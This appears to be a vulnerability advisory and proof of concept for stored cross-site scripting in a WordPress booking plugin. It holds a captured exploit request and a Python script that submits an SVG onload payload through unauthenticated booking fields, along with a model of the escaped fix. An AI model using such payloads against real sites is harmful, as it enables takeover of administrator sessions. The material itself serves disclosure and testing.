An unauthenticated visitor can submit a booking whose free-text fields contain JavaScript. The input is stored without sanitisation and is rendered unescaped when an authenticated user views the booking in the WordPress admin interface, so the script executes in the administrator's browser (stored cross-site scripting). The request below, captured with Firefox against a local test instance, submits the payload in the `email_1` and `fieldname2_1` fields.
```http
POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1

-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"

2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"


-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"

2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"

"><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"

"><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

auvoe
-----------------------------11713224624340267851833710283--
```
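The following Python example is added here and is not part of the original advisory or of the plugin's code. It rebuilds the multipart body from the captured field names so the submission can be scripted, and then models the admin-side sink in two forms: unescaped, which is how the stored value reaches the admin page in the vulnerable version, and escaped, which is what a fix along the lines of WordPress's `esc_attr()` would produce. The target URL, the boundary string and the marker payload `"><svg onload=alert(document.domain)>` are assumptions chosen for illustration; the field names, the slot value and the captcha answer are taken from the captured request.

```python
"""Reproducer for the booking-form stored XSS plus a check of the admin sink.
Added example; the payload, URL and boundary are constructed, not from the capture."""
import html
import urllib.request  # used only by send_booking(); nothing here talks to a network by default

# Constructed marker payload: the leading quote closes a double-quoted attribute,
# '>' closes the tag, and the <svg> element runs its handler on load.
PAYLOAD = '"><svg onload=alert(document.domain)>'


def booking_fields(payload, ref_page="http://test.local/booking-form/",
                   slot="2019-07-13 12:00/13:00 0 1", captcha="auvoe"):
    """Field list from the captured request; email_1 and fieldname2_1 carry the payload.
    The captcha answer is the one seen in the capture and is valid for that session only."""
    return [
        ("cp_pform_psequence", "_1"),
        ("cp_appbooking_pform_process", "1"),
        ("cp_appbooking_id", "2"),
        ("cp_ref_page", ref_page),
        ("form_structure_1", ""),
        ("refpage_1", ref_page),
        ("fieldname1_1", slot),
        ("fieldname1_1_services", "0"),
        ("fieldname1_1_capacity", "0"),
        ("tcostfieldname1_1", "1.00"),
        ("email_1", payload),
        ("fieldname2_1", payload),
        ("hdcaptcha_cp_appbooking_post", captcha),
    ]


def build_multipart(fields, boundary):
    """Encode (name, value) pairs as multipart/form-data, one part per field,
    using CRLF line endings and the closing 'boundary--' marker as the browser did."""
    lines = []
    for name, value in fields:
        lines.append(f"--{boundary}")
        lines.append(f'Content-Disposition: form-data; name="{name}"')
        lines.append("")
        lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode("utf-8")


def send_booking(url, payload=PAYLOAD, cookie=None,
                 boundary="----pocboundary7e2c5cd53a016331a3"):
    """POST the booking. In practice the form must be loaded first so that the
    session cookie and a fresh captcha answer can be supplied; this helper only
    shows the request shape. URL and boundary are assumptions."""
    body = build_multipart(booking_fields(payload), boundary)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.status


# --- Admin-side sink, modelled both ways -------------------------------------

def render_unescaped(value):
    """Vulnerable pattern: stored value dropped straight into an attribute."""
    return f'<input type="text" value="{value}">'


def render_escaped(value):
    """Fixed pattern: attribute-encode on output (html.escape with quote=True
    behaves like WordPress esc_attr() for the characters that matter here)."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def tag_count(rendered):
    """Number of '<' characters in the rendered fragment. A single, intact
    <input> element has exactly one; any more means the payload broke out."""
    return rendered.count("<")


if __name__ == "__main__":
    print(build_multipart(booking_fields(PAYLOAD), "----pocboundary").decode())
    print("unescaped:", render_unescaped(PAYLOAD), "tags:", tag_count(render_unescaped(PAYLOAD)))
    print("escaped:  ", render_escaped(PAYLOAD), "tags:", tag_count(render_escaped(PAYLOAD)))
```

The `tag_count` check is a deliberately crude oracle: it only tells you whether the value stayed inside its attribute, which is the property the fix has to guarantee. Because the captured `hdcaptcha_cp_appbooking_post` answer belongs to the session whose cookies appear in the capture, an actual run needs a fresh GET of the form, the resulting cookies, and a newly solved captcha before `send_booking` will be accepted.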